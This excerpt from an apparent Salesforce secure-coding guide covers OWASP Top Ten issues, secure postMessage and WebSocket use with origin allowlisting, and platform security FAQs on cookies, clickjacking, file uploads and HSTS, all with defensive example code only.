Top Ten checklist. Here are some specific issues to look out for when building composite apps:
Authentication (Session management)
Authentication and session management need to be correctly implemented. That means using secure procedures to create, manage, and end a session for each authorized user. Session IDs should be properly rotated and set with the correct cookie flags. Always prefer your framework's session management features, as they're thoroughly tested and more frequently updated.
https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management
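As an illustration of "correct cookie flags", framework session settings typically expose options like the following. This is an Express-style sketch with hypothetical values, not a prescription:

```javascript
// Express-style session cookie options (hypothetical values).
var sessionCookieOptions = {
  httpOnly: true,          // not readable from page JavaScript
  secure: true,            // sent only over HTTPS
  sameSite: "lax",         // limits cross-site sending
  maxAge: 30 * 60 * 1000   // 30 minutes, forces rotation/expiry
};
```

Whatever framework you use, verify that its session cookie carries the equivalent of these flags.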
Access Control
The app needs to verify the user’s session and permission levels before giving access to any restricted
data or function. For example, this could be a standard user accessing admin-level setting pages, or user
A viewing user B’s purchase history.
• https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control
• https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
Sensitive Information in errors
The correct handling of errors and responses is critical to preventing fingerprinting and enumeration by a possible attacker. Common error responses such as stack traces and debug
logs should be hidden from the user because an attacker can use this to gain more information about
the server/application.
https://www.owasp.org/index.php/Improper_Error_Handling
Cross Site Request Forgery (CSRF)
This vulnerability is used by attackers to trick an authenticated user into performing an unwanted action on the vulnerable target server. To achieve this, the attacker crafts a URL or a form inside a malicious page and tricks the victim into accessing it. CSRF attacks typically target state-changing requests, because the attacker has no way to see the response of the forged request.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
HTML injection and Cross Site Scripting (XSS)
HTML injection vulnerabilities occur when an attacker can inject their own HTML code in a vulnerable
website, and make it appear as if it is originally there. For example, the attacker may be able to inject an
<iframe> and display a completely different page. Cross Site Scripting is a vulnerability where an attacker
can inject their own javascript (instead of just HTML) that executes in the context of a vulnerable domain.
The attacker can then craft a payload and trick a victim into visiting a link, and the attacker's JavaScript will execute in the victim's browser.
https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Arbitrary Redirects
The vulnerable server performs a redirect using user-controlled data in a URL. This allows the attacker to use a normal-looking server URL to redirect a victim to a malicious site. In addition, if your site uses one page to forward to other resources, an attacker could modify the input parameter and bypass permission checks.
https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards
Remote Code Execution
The web app or server runs code that is vulnerable to specially crafted input data, leading to the execution of commands on the target machine. This normally stems from three basic sources:
• The web server runs a vulnerable service listening on ports open to the internet. Check that every service listening on a port on your web server is not vulnerable and has no public working exploit.
• The web app uses vulnerable components. Double-check every software package (gems, node modules, libraries, and so on) that your app uses to process documents, process images, open connections (such as external URIs), or parse XML.
• The application processes user input as serialized data. Deserialize user data with caution, as it could lead to remote code execution.
https://www.owasp.org/index.php/Command_Injection
Using Insecure Software
Most applications use some kind of third-party components, such as Javascript libraries, server side
frameworks and application servers. Ensure you are using the latest available version with no known
security vulnerabilities. Vulnerable versions are easy to identify and can open up your application to a
broader attack surface.
https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities
SQL Injection
A SQL injection attack consists of insertion, or "injection", of a SQL query via the input data from the
client to the application. SQL injection attacks are a type of injection attack, in which SQL commands
are injected as a part of user supplied input in order to effect the execution of predefined SQL commands.
https://www.owasp.org/index.php/Top_10_2013-A1-Injection
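The standard defense is a parameterized query, in which user input travels to the database as data rather than as SQL text. A sketch against a hypothetical driver interface:

```javascript
// Build a parameterized statement: the driver sends `name` as a bound
// value, never as SQL text, so quotes in the input cannot change the query.
function buildUserQuery(name) {
  return {
    text: "SELECT id FROM users WHERE name = ?",
    values: [name]
  };
}
```

With a real driver this would be executed as, for example, db.query(q.text, q.values) (hypothetical API); never concatenate the input into the SQL string.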
Storage of sensitive Data
Sensitive data such as passwords, credit card information, Social Security Numbers and other PII need
to be securely stored on the server using the industry best practice for secure storage on your platform.
https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
CHAPTER 12 Secure Coding PostMessage
A secure postMessage invocation example to send a message to another domain:
recipientWindow.postMessage("This is a message", "https://salesforce.com");
Here recipientWindow is the sender's handle to the window object of the intended recipient. There are various mechanisms by which the sender can get the JavaScript handle to a target window, so we will skip that.
• "This is a message" is the actual message that is sent to the recipient window. It can be any object
and not just a string message.
• "https://salesforce.com" is the target domain to which the message must be delivered. If the recipient
window has navigated to a different domain, the browser will discard the message and not deliver
it, ensuring confidentiality of the information.
You can also specify "*" as the target domain name if you want to send your message to any domain
on the target window. That is an insecure use of postMessage API and must be avoided. If the target
window navigates to a new origin, your message may end up being delivered to a malicious domain
resulting in information leakage.
It is important to always specify the precise target origin while sending postMessage(s). You can also
use '/' as target origin if you want the receiving origin to be the same as the sending origin.
Receiver
Since any origin can send messages to your window and message handlers, it is recommended to accept
messages only from domains on an allowlist. Failure to check source origin can result in cross site scripting,
information leakage or denial of service attacks on your application. It is also recommended to validate
the format of incoming data prior to processing. Always assume that the received messages are malicious
and program defensively.
An example secure implementation to process incoming messages may look as follows:
window.addEventListener("message", processMessages);
function processMessages(event) {
    if (event.origin === "https://salesforce.com") { // accept only allowlisted origins
        // do something
    } else {
        // ignore message or throw error
    }
}
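A variant that checks the sender against an allowlist of origins and validates the message format before processing. The origins are hypothetical placeholders:

```javascript
// Hypothetical allowlist of trusted sender origins.
var ALLOWED_ORIGINS = ["https://app-a.example.com", "https://app-b.example.com"];

// Returns the message payload if trusted and well-formed, else null.
function handleMessage(event) {
  if (ALLOWED_ORIGINS.indexOf(event.origin) < 0) {
    return null; // ignore messages from unknown origins
  }
  if (typeof event.data !== "string") {
    return null; // validate format before processing
  }
  return event.data;
}
```

Registered with window.addEventListener("message", ...), this drops anything that isn't a string from a trusted origin, in line with the "assume messages are malicious" guidance above.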
To summarize, the postMessage API is a powerful developer tool and must be used with caution. General guidelines for its use are:
• While sending messages
– Provide a specific destination origin unless there is a need to broadcast your message to all domains
• While receiving messages
– Accept messages only from origins on an allowlist, and validate the format of incoming data before processing it
References:
• whatwg.org web messaging
• Mozilla developer
CHAPTER 13 Secure Coding WebSockets
Secure WebSockets
WebSocket is a full duplex communication protocol introduced in HTML5, allowing real-time data
exchange between the web browsers (or other clients) and the server. A WebSocket connection is
established after a WebSocket handshake between client and the server. The handshake happens over
the HTTP protocol.
As with all new technologies, WebSocket presents some interesting security challenges, for which we discuss countermeasures below.
Implement Strong Countermeasures against Cross-Site WebSocket Hijacking (CSWSH) Attacks
By design, WebSocket connections are not restricted by the Same Origin Policy. This allows WebSocket
connections to establish and exchange data between different origins. The specification does not offer
any advice on the authentication mechanism.
Let us assume that your web application uses ambient client credentials, like cookies, client SSL certificates, or HTTP authentication, to protect its WebSocket communication. In this case, when a cross-origin WebSocket connection is established, the browser automatically sends these credentials along with the request. The server then authenticates the client and returns the requested data, allowing cross-domain data retrieval and a Same Origin Policy bypass.
Specifically, enforce that the Origin header matches one of the domains on your allowlist. All modern browsers add the Origin request header to cross-origin requests, so this should be easy to implement.
Consider implementing custom authentication mechanisms, such as OAuth or SAML, to authenticate WebSockets, and send these tokens in custom HTTP request headers for your application. This prevents the browser from automatically appending client credentials to WebSocket requests, and it protects you in scenarios where Origin header validation is difficult to support for any reason.
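Server-side, the Origin check during the handshake can be sketched as follows; the allowlist values are hypothetical:

```javascript
// Hypothetical allowlist for WebSocket handshakes.
var ALLOWED_WS_ORIGINS = ["https://app.example.com"];

// Accept the upgrade request only when the browser-set Origin
// header matches an allowlisted domain exactly.
function shouldAcceptHandshake(headers) {
  var origin = headers["origin"];
  return typeof origin === "string" &&
         ALLOWED_WS_ORIGINS.indexOf(origin) >= 0;
}
```

An exact string match against the full origin (scheme plus host) avoids substring bypasses such as "https://app.example.com.evil.net".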
Always Use WSS
WebSocket defines two new URI schemes, ws and wss. wss:// is secure, while ws:// is inherently insecure: it sends all data over an unencrypted channel and must not be used. Web applications must always use wss:// for WebSockets, a secure protocol that relies on Transport Layer Security to protect the communication channel. In addition, the code that performs WebSocket connections must itself be delivered over HTTPS to prevent sslstrip-like MiTM attacks.
Example code to create a secure WebSocket:
var webSocket = new
WebSocket("wss://www.salesforce.com/OAuthProtectedResource")
References
• WebSocket
• Heroku - Websocket Security
• Cross Site Web Socket Hijacking - Christian Schneider
CHAPTER 14 Platform Security FAQs
Get answers to common security questions for the App Cloud platform and understand common false
positive findings from third-party Security Assessments against the App Cloud platform.
Secure Cookies
Certain cookies served from the salesforce.com domain aren't set as secure, or are set as persistent. This is intentional.
There are several cookies that the platform uses to enhance functionality that don’t contain any session
information. If an attacker accesses or alters those cookies, they can’t use the cookies to gain access or
escalate privilege in Salesforce.
The session cookie "sid" is marked as secure and is non-persistent. In other words, the cookie is deleted
when the browser is closed.
Data validation
Data validation or data quality issues don’t fall under security. However, some customers wonder why
data from some input fields aren’t validated server-side as part of saving that data in an object.
Most default data validation and quality rules are enforced only on the client side, so they can be bypassed, for example, when you update a picklist value to a non-defined value via the API or when you modify a standard page edit POST.
Here are some examples of data validation rules that are enforced server side.
• Setting a lookup ID to a non-existent record ID.
• Data type enforcement for a field, for example, you cannot set a number field with text values.
• Object Validation Rules or Apex Triggers that validate data.
Clickjacking
Clickjacking is a type of attack that tricks users into clicking something, such as a button or link. The click
sends an HTTP request that performs malicious actions that can lead to data intrusion, unauthorized
emails, changed credentials, or similar results. To help protect against this kind of attack, most Salesforce
pages can only be served in an inline frame by a page on the same domain.
Experience Cloud sites have two clickjack protection parts—one for the Experience Cloud site, which is
set from the Salesforce site detail page, and another for the Site.com site, which is set from the Site.com
configuration page. It's recommended that both are set to the same value.
For more information, see Configure Clickjack Protection in Salesforce Help.
Cross-Site Scripting
All standard pages output encode user-controlled data in the proper context.
For Visualforce pages, all merge fields are HTML encoded by default.
Any cross-site scripting vulnerabilities that occur from custom Visualforce pages must be addressed with
best practice recommendations and tools provided for developers.
Apex and Visualforce provide additional encoding utilities for other contexts. Developers are responsible for proper output encoding in non-HTML contexts. See Cross Site Scripting (XSS) in the Apex Developer Guide.
The platform implements context-specific output encoding for user-controlled data. Salesforce data can
be presented in a multitude of contexts and systems, which makes it challenging to successfully anticipate
the correct context for data at input time.
Standard pages are designed to properly encode data in the correct context in which the data is displayed.
If input encoding is required, you can implement custom triggers on desired objects and fields. For more
information, see Secure Coding Cross Site Scripting
File Upload
We’re aware that it is possible for malicious users to upload files that contain malicious content and that
a user who downloads the file can be compromised if antivirus software doesn’t detect the malicious
code.
Files stored in Salesforce aren’t scanned for malicious content. The data is stored as binary on Salesforce
servers. Certain file types are parsed for search indexing or for preview display and controls have been
put in place to ensure the process occurs in an isolated environment with limited privileges.
To protect the platform, files and attachments are stored within the services in such a manner that if
something was uploaded which was infected, it has no effect on the rest of the service or other files
because of the way it is stored. Salesforce can’t control the customer's end points, and it is a customer
responsibility to ensure that those endpoints have up-to-date antivirus protection.
The app layer is abstracted from the infrastructure layer via our multi-tenant model, hence we are speaking to two different parts: the infrastructure layer, which we manage and protect, and the app layer, where users are able to upload anything they want in a secure manner. Salesforce can't control whether a user chooses to upload an infected file, or whether some of our customers intentionally upload items that are known to be infected.
Certain file types and upload and download behavior can be managed via File Upload and Download
Security in Setup. For other file types, custom Apex triggers on related objects can limit the file extensions
uploaded.
For more information, see Configure File Upload and Download Security Settings in Salesforce Help and
the Configure the setting 'File Upload and Download Security' knowledge article.
To monitor files and URLs that are uploaded to or downloaded from Salesforce, you can also use external
add-ons.
FRONTDOOR.JSP SID
The frontdoor.jsp SID used via login.salesforce.com is a temporary session ID that can't be used after login. Salesforce is aware of the ability to log in via frontdoor.jsp?sid=<sessionid> via the API.
(You can't use the temporary session ID, only the SID created upon login.)
For more information about this behavior, see Using Frontdoor.jsp to Bridge an Existing Session Into Salesforce in Salesforce Help.
JSESSIONID
JSESSIONID is a temporary session ID and the cookie can’t be exploited. The main session cookie is the
SID and it is marked secure.
HTTP Header: Content-Security-Policy (CSP) frame-ancestors Directive
Clickjacking uses a trusted domain or site to trick users into clicking a malicious link. With clickjacking,
the trusted domain is served in an iframe, then a hidden or transparent UI control is served in the same
location. For example, a transparent button on top of the Save button. The user thinks that they’re clicking
the top-level iframe when they’re really clicking the hidden UI control.
To protect your users, Salesforce uses clickjack protection. For pages that Salesforce serves, clickjack
protection is implemented through the Content-Security-Policy (CSP) HTTP response header
frame-ancestors directive. That directive tells the browser which sites are allowed to load the
page in an iframe.
Note: The CSP frame-ancestors header directive replaces the obsolete X-Frame-Options header.
For more information, see X-Frame-Options on the Mozilla Developer Network.
By default, Visualforce pages can be loaded in an iframe. For Visualforce pages with headers, the
CSP frame-ancestors HTTP response header directive is absent. We highly recommend that you enable
clickjack protection for your Visualforce pages and specify the trusted domains for inline frames for other
features. For more information, see Configure Clickjack Protection in Salesforce Help.
The frame-ancestors directive indicates that only salesforce.com and force.com can include an iframe of Salesforce services.
HSTS
Note: HSTS is enabled for authenticated traffic only on the App Servers (your Salesforce instance).
If you serve your Experience Cloud sites or Salesforce Sites on a registrable custom domain, such as
https://example.com, you can include the HSTS HTTP header in the headers for your custom domain
via a setting. See Enable HSTS Preloading on a Custom Domain in Salesforce Help.